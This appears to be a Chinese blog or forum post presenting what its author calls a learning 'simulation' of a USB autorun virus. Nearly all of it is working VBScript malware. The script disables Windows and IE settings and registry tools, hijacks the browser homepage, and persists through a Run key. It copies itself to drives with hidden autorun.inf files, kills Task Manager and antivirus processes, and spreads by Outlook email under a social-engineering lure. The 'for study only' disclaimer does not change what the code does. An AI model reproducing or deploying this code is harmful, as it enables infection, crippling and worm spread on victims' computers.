今日彭泽,世纪花园幼儿园,灭神记txt
使用过u盘的朋友都知道u盘病毒是一种autorun自运行病毒,当双击时触发病毒体,会复制自身到c d e和系统盘system32下等盘符,(生成exe文件和一个autorun.inf文件),同时修改注册表,当点击c盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on error resume next
dim fso,wsh,myfile,ws,pp,fsofolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.getfile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和ie各项设置)
wsh.regwrite "hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue",0,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","c:\nyboy.vbs"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry",""
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\notraycontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\startmenulogoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosmhelp",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nonethood",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowinkeys",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocsmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofind","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowindowsupdate",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofavoritesmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocshistory",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.regwrite "hklm\software\classes\drive\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hkcr\drive\shell\","auto"
wsh.regwrite "hkcr\drive\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\","auto"
wsh.regwrite "hkcr\directory\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\auto\command\","c:\nyboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.regwrite "hkcr\exefile\defaulticon\","c:\1.ico"
wsh.regwrite "hkcr\txtfile\defaulticon\","c:\1.ico"
wsh.regwrite "hkcr\dllfile\defaulticon\","c:\1.ico"
wsh.regwrite "hkcr\batfile\defaulticon\","c:\1.ico"
wsh.regwrite "hkcr\inifile\defaulticon\","c:\1.ico"
wsh.regwrite "hklm\software\classes\exefile\defaulticon\","c:\1.ico"
wsh.regwrite "hklm\software\classes\txtfile\defaulticon\","c:\1.ico"
wsh.regwrite "hklm\software\classes\dllfile\defaulticon\","c:\1.ico"
wsh.regwrite "hklm\software\classes\batfile\defaulticon\","c:\1.ico"
wsh.regwrite "hklm\software\classes\inifile\defaulticon\","c:\1.ico"
wsh.regwrite "hklm\software\classes\.reg\","txtfile"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","你好啊,大兵和你开个小小的玩笑"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","你已经中毒了,赶快杀毒或者与qq252287438联系"
'复制自身到c,d,e,f,u盘
myfile.copy "c:\"
myfile.copy "d:\"
myfile.copy "e:\"
myfile.copy "f:\"
myfile.copy "i:\"
myfile.attributes=34
'定义autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
if fso.fileexists("c:\autorun.inf") then
set objfolder = fso.getfile("c:\autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>c:\autorun.inf"_
&"&& echo open=nyboy.bat >>c:\autorun.inf"_
&"&& echo shellexecute=nyboy.bat >>c:\autorun.inf"_
&"&& echo shell\auto\command=nyboy.bat>>c:\autorun.inf"_
&"&& echo shell=auto>>c:\autorun.inf"_
&"&& attrib +h +s +r c:\autorun.inf"
set autobatc=fso.createtextfile("c:\nyboy.bat",1,ture)
autobatc.writeline("nyboy.vbs")
end if
if fso.fileexists("d:\autorun.inf") then
set objfolder = fso.getfile("d:\autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>d:\autorun.inf"_
&"&& echo open=nyboy.bat >>d:\autorun.inf"_
&"&& echo shellexecute=nyboy.bat >>d:\autorun.inf"_
&"&& echo shell\auto\command=nyboy.bat>>d:\autorun.inf"_
&"&& echo shell=auto>>d:\autorun.inf"_
&"&& attrib +h +s +r d:\autorun.inf"
set autobatd=fso.createtextfile("d:\nyboy.bat",1,ture)
autobatd.writeline("nyboy.vbs")
end if
if fso.fileexists("e:\autorun.inf") then
set objfolder = fso.getfile("e:\autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>e:\autorun.inf"_
&"&& echo open=nyboy.bat >>e:\autorun.inf"_
&"&& echo shellexecute=nyboy.bat >>e:\autorun.inf"_
&"&& echo shell\auto\command=nyboy.bat>>e:\autorun.inf"_
&"&& echo shell=auto>>e:\autorun.inf"_
&"&& attrib +h +s +r e:\autorun.inf"
set autobate=fso.createtextfile("e:\nyboy.bat",1,ture)
autobate.writeline("nyboy.vbs")
end if
if fso.fileexists("f:\autorun.inf") then
set objfolder = fso.getfile("f:\autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>f:\autorun.inf"_
&"&& echo open=nyboy.bat >>f:\autorun.inf"_
&"&& echo shellexecute=nyboy.bat >>f:\autorun.inf"_
&"&& echo shell\auto\command=nyboy.bat>>f:\autorun.inf"_
&"&& echo shell=auto>>f:\autorun.inf"_
&"&& attrib +h +s +r f:\autorun.inf"
set autobatf=fso.createtextfile("f:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
if fso.fileexists("i:\autorun.inf") then
set objfolder = fso.getfile("i:\autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>i:\autorun.inf"_
&"&& echo open=nyboy.bat >>i:\autorun.inf"_
&"&& echo shellexecute=nyboy.bat >>i:\autorun.inf"_
&"&& echo shell\auto\command=nyboy.bat>>i:\autorun.inf"_
&"&& echo shell=auto>>i:\autorun.inf"_
&"&& attrib +h +s +r i:\autorun.inf"
set autobatf=fso.createtextfile("i:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r c:\nyboy.bat"_
&"&& attrib +h +s +r d:\nyboy.bat"_
&"&& attrib +h +s +r e:\nyboy.bat"_
&"&& attrib +h +s +r f:\nyboy.bat"_
&"&& attrib +h +s +r i:\nyboy.bat"
'强制结束某些进程,比如qq,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or name = 'qq.exe'or name = 'notepad.exe'or name = 'iexplore.exe'or name = 'cmd.exe'or name = 'avp.exe'or name = 'winrar.exe'or name = 'realplay.exe'or name = 'winword.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
set ol=createobject("outlook.application")
on error resume next
for x=1 to 5
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
mail.subject="今晚你来吗?"
mail.body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! qq交友频道"
mail.attachments.add("c:\nyboy.vbs")
mail.send
next
ol.quit
如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!!
点击进行留言回复
我要评论
网友评论